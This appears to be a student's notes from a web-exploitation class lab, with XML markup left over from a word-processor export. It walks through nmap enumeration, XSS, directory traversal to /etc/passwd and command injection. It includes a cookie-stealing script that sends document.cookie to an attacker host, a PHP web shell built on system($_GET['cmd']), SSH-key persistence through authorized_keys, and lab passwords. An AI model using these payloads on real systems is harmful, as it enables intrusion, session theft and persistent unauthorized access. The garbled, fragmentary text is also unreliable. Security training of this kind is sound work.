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Web Exploitation (XSS)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Ops-Station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F12 to open developer console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Inspector: make modifications to render only on client-side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Network: all the requests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page.php?name=someval&amp;time=someval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page.php?file=passwd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Enumeration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ROBOTS.TXT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Legit surfing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NSE scripts- nmap… http-enum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Nikto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Burp suites (outside class)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nmap 10.50.37.72 -Pn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PORT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">STATE</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SERVICE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22/tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">open</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ssh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80/tcp open</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http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nmap 10.50.27.72 -Pn - -script http-enum -p 80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10.50.37.72/robots.txt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Reflected XXS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10.50.37.72/cross --&gt; XXSdemo.php --&gt; input: &lt;script&gt;alert(“Hacked”);&lt;/script&gt;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Stored XSS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using python script capture to “listen”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lin-ops:~$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mkdir temp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cd ttemp/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python3 -m http.server &lt;port&gt; #default 8000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firefox - &gt; 192.168.24.161:8000 #it’s listening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10.50.37.72/java/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&lt;script&gt;document.location=”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10.50.21.207</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/stealer.php?cookie=”+document.cookie;&lt;/script&gt;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Directory Traversal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/../../../../../../../etc/passwd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 Injection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10.50.37.72/cmdinjection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input field &gt; ;whoami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Stealing SSH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ssh-keygen -t rsa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 password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enter enter..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ls .ssh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id_rsa is private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id_rsa.pub is public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cat .sh/id_rsa.pub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*include everything*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/etc/passwd file…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www-data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/var/www is home directory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/bin/bash is default shell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.ssh folder there?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ls -la /var/www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mkdir /var/www/.ssh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ls -la /var/www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echo “” &gt;&gt; /var/www/.ssh/authorized_keys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ssh www-data@10.50.37.72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What if the input box did not exit?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 this text into opsstation to a file with .php…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&lt;HTML&gt;&lt;BODY&gt;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&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;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&lt;INPUT TYPE="text" NAME="cmd"&gt;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&lt;INPUT TYPE="submit" VALUE="Send"&gt;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&lt;/FORM&gt;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&lt;pre&gt;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&lt;?php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if($_GET['cmd']) {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system($_GET['cmd']);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?&gt;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&lt;/pre&gt;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&lt;/BODY&gt;&lt;/HTML&gt;</w:t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Ex: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cat keel.php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10.50.37.72 -&gt; browse &gt; keep.php &gt; upload file now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10.50.37.72/uploads</w:t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*everything is same except the ;*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PE Web Exploit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step 0) local port forward to jumpbox + create dynamic tunnel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step 1)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nmap 10.10 -Pn --script http-enum -p 80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step 2)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10.50.37.72/uploads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billybob:x:1001:1001:you found me SNP3VbbJqIKSvrINxKdL:/home/billybob:/bin/bash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step 3)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nano keel.php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&lt;HTML&gt;&lt;BODY&gt;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&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;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&lt;INPUT TYPE="text" NAME="cmd"&gt;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&lt;INPUT TYPE="submit" VALUE="Send"&gt;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&lt;/FORM&gt;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&lt;pre&gt;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&lt;?php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if($_GET['cmd']) {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system($_GET['cmd']);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?&gt;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&lt;/pre&gt;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&lt;/BODY&gt;&lt;/HTML&gt;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step 4)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10.50.37.72/uploads/keel.php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cat /../../../../../../../../etc/passwd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billybob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/home/billybob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mkdir /home/billybob/.ssh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ls -la /home/billybob/.ssh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echo “” &gt;&gt; /home/billybob/.ssh/authorized_keys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lin-ops$ proxychains ssh billybob@10.100.28.40 -p 4444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cd /home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cat contracts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lin-ops$ python3 -m http.server 8000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&lt;script&gt;document.location=”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10.50.21.207</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/stealer.php?cookie=”+document.cookie;&lt;/script&gt;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WEB EXPLOITATION STEPS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/robots.txt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﻿http-enum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passive browsing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PE Server: </w:t>
    </w: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http://10.50.20.250:8000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AHKA-919-A</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097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AbL96ElEXErsWr9</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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xfreerdp /v:10.50.21.207 /u:student /p:password /size:1920x1000 +clipboard</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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ssh user: student</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
    <w:pPr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ssh pass: AbL96ElEXErsWr9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10.50.20.250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